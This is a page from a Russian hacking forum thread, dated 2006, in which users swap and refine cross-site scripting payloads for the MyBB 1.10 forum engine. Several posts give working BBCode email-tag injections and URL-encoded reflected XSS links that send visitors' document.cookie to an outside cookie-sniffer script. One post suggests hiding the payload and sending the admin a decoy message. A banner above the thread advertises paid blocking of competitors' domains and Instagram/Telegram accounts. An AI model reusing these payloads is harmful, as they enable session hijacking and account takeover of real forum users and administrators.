Форум АНТИЧАТ - Уязвимость движка MyBB

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Уязвимость движка MyBB

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

03.07.2006, 14:58

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

Провел на форуме:
584821

Репутация: 83

Отправить сообщение для Romaxa55 с помощью ICQ

Хммм что то всеравно не то, получаю такой исходник

Код:

>[c ode][e mail=a&quot;style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+(document.cookie);this.sss=null`mail@mail.ru ]sex[/e mail][/c ode]</textarea>

Не могу понять, почему код алерта работает
[c ode][e mail=a"onmousemove="alert(document.cookie);"mail@m ail.ru]Нажми сюда![/e mail][/c ode]
Хотя на выходи я вижу вот что:
<a href="mailto:a"onmousemove="alert(document.cookie) ;"mail@mail.ru">Нажми сюда!</a></div><br />
Чтож такое, люди, может кто знает?

Последний раз редактировалось Romaxa55; 03.07.2006 в 15:05..

#12

03.07.2006, 17:23

Cheburek

Новичок

Регистрация: 22.05.2006

Сообщений: 18

Провел на форуме:
209222

Репутация: 0

Romaxa55, кинь в пм ссылку на сайт? А активный xss тоже не сраотал? Странно....

#13

03.07.2006, 17:49

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

Провел на форуме:
584821

Репутация: 83

Вот что у меня заработало, межсайтовый скиптинг но какз наете не совсем удобно его юзать админ не так уж глуп чтоб юзать линки незнакомые. Хотеловсь бы что нить с бб кодами, но выше приведеные советы не помогли, везде чтонить да фильтруется. Может можно вставить код который при наведение мыши не алер вылетал а окрытие страницы происходило?? Вот пример сплоитов:

Код:

http://forum.host/member.php?action=do_login&username=(Login]&password={pass}&url=">%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E

Код:

http://forum.host/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=advanced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&action=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Eimg%20=%20new%20Image();%20img.src%20=%20"%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65;%3C/script%3E&preview=Preview

[mod]Убедительная просьба ко всем: Вместо тэга [quote] при цитировании кода использовать тэг [code] Чтобы топик не разъезжался. Спасибо. [/mod]

Последний раз редактировалось Azazel; 03.07.2006 в 18:19..

#14

03.07.2006, 21:45

Cheburek

Новичок

Регистрация: 22.05.2006

Сообщений: 18

Провел на форуме:
209222

Репутация: 0

я з@#$%^ся его подбирать.... вот пассивный xss ...

Код HTML:

[*code][*email=a"style="top:expression(eval(this.sss));"sss=`ii=new/**/Image();ii.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;this.sss=null`"mail@mail.ru]Нажми сюда![/email*][/code*]

добавлено позже:
можно в style добавить style=visibility:hidden; и написать админу вообще левую телегу ... он даже и не подумает что в сообщений может быть что-то потенциально опасное...

Последний раз редактировалось Cheburek; 03.07.2006 в 22:01..

#15

04.07.2006, 01:46

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

Провел на форуме:
584821

Репутация: 83

Хочу выразить огромную благодарность Cheburek'у!!!
И давайте подвидем итоги по уязвимости MyBB v1.10

Рабочие XSS:
с Алертом

Код:

[code*][email=a"onmousemove="alert(document.cookie);"mail@mail.ru]Нажми сюда![/email*][/code*]

Со сниффером:

Код:

[*code][*email=a"style="top:expression(eval(this.sss));"sss=`ii=new/**/Image();ii.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;this.sss=null`"mail@mail.ru]Нажми сюда![/emai*l][*/code]

P.S. При использывании кода необходимо убрать звездочки!

Тема может быть закрыта!

#16

22.08.2007, 21:56

schut123

Участник форума

Регистрация: 02.01.2007

Сообщений: 202

Провел на форуме:
868377

Репутация: 99

Не работают эти эксплойты, так как стоит фильтрация на ковычки и Bb коды

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Подборка уязвимостей phpBB	-=ka$at1k=-	Форумы	3	02.07.2006 15:26
Свеженькая XSS уязвимость в форуме mybb 1.10	Vantuz86	Форумы	0	11.04.2006 22:58
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ?	bike	Форумы	2	24.12.2005 17:28
Заключение MyBB	KEZ	Уязвимости	4	31.03.2005 12:51
Уязвимость в iChat'е.	-SX-	Болталка	0	15.01.2005 23:46

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход